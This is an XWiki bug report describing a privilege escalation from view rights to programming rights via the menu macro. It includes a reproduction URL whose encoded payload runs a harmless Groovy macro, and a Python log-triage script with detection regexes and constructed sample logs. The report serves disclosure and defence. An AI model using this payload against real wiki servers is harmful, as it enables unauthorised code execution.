XWiki Platform - XWIKI-19857

Privilege escalation (PR) from view rights through the menu macro

Details

    • High
    • Unknown
    • N/A
    • N/A

    Description

      Steps to reproduce:

      Open <server>/xwiki/bin/view/Main?sheet=CKEditor.HTMLConverter&language=en&sourceSyntax=xwiki%2F2.1&stripHTMLEnvelope=true&fromHTML=false&toHTML=true&text=%7B%7Bmenu%7D%7D%7B%7Bcache+id%3D%22menuMacro%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello+from+Groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fcache%7D%7D%7B%7B%2Fmenu%7D%7D, where <server> is the URL of your XWiki installation.

      Expected result:

      An error stating that the current user doesn't have programming rights.

      Actual result:

      The text "Hello from Groovy!" is displayed, showing that we've executed a Groovy macro and thus gained programming rights from view rights.

      Note that while the reproduction steps above place the payload in the macro content, the same kind of privilege escalation is also possible through the menu macro's id and type parameters.

      The affects version is only the version in which the problem has been reproduced; the issue is most likely as old as the menu macro itself, which was introduced in XWIKI-9148, i.e., XWiki 5.1-rc-1.
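      As an added example that is not part of this report or of XWiki's own code, the following script shows how an administrator can triage web-server access logs for requests matching the pattern above: a call to the CKEditor.HTMLConverter sheet whose decoded text parameter contains both a menu macro and a groovy macro (in the content or in a parameter). The log lines are constructed for the example; the regular expression for the combined log format and the case-insensitive macro matching are assumptions. A hit is a review signal rather than proof of abuse, since a user who legitimately holds programming rights may submit the same request.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the report). The first
# request mirrors the URL from the reproduction steps; the others are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2022:10:00:00 +0000] "GET /xwiki/bin/view/Main?sheet=CKEditor.HTMLConverter&language=en&sourceSyntax=xwiki%2F2.1&stripHTMLEnvelope=true&fromHTML=false&toHTML=true&text=%7B%7Bmenu%7D%7D%7B%7Bcache+id%3D%22menuMacro%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello+from+Groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fcache%7D%7D%7B%7B%2Fmenu%7D%7D HTTP/1.1" 200 512
10.0.0.6 - - [01/Aug/2022:10:00:01 +0000] "GET /xwiki/bin/view/Main?sheet=CKEditor.HTMLConverter&text=%7B%7Bmenu+id%3D%22nav%22%7D%7D%5B%5BMain.WebHome%5D%5D%7B%7B%2Fmenu%7D%7D HTTP/1.1" 200 128
10.0.0.7 - - [01/Aug/2022:10:00:02 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 4096
"""

# Assumed combined log format: client, ident, user, [timestamp], "request", status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Opening tags of the two macros involved in the report. Matching is
# case-insensitive (a defensive assumption) so trivial casing variants are not missed.
MENU_RE = re.compile(r'\{\{\s*menu\b', re.IGNORECASE)
GROOVY_RE = re.compile(r'\{\{\s*groovy\b', re.IGNORECASE)


def parse_log_line(line):
    """Return (client, method, path, query) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    # parse_qs percent-decodes and turns '+' into spaces, so the text parameter
    # comes out as the wiki syntax the HTMLConverter sheet would actually receive.
    query = parse_qs(parts.query, keep_blank_values=True)
    return m.group('client'), m.group('method'), parts.path, query


def is_menu_groovy_abuse(text):
    """True when a menu macro and a groovy macro both appear in the submitted wiki
    syntax, whether the groovy macro sits in the menu content or in a menu parameter."""
    return bool(MENU_RE.search(text)) and bool(GROOVY_RE.search(text))


def scan_log(log_text):
    """Collect HTMLConverter requests whose text parameter matches the report's pattern."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_log_line(line)
        if parsed is None:
            continue
        client, method, path, query = parsed
        if query.get('sheet', [''])[0] != 'CKEditor.HTMLConverter':
            continue
        for text in query.get('text', []):
            if is_menu_groovy_abuse(text):
                findings.append({'client': client, 'path': path, 'text': text})
    return findings


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(f"review: HTMLConverter request from {finding['client']}: {finding['text']!r}")
```

      Running the script against the constructed sample flags only the first request; the second line also uses the menu macro but carries no script macro and is therefore not reported. Because parsing happens on the decoded text parameter, the check is independent of how the request was percent-encoded on the wire.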

      People

        Michael Hamann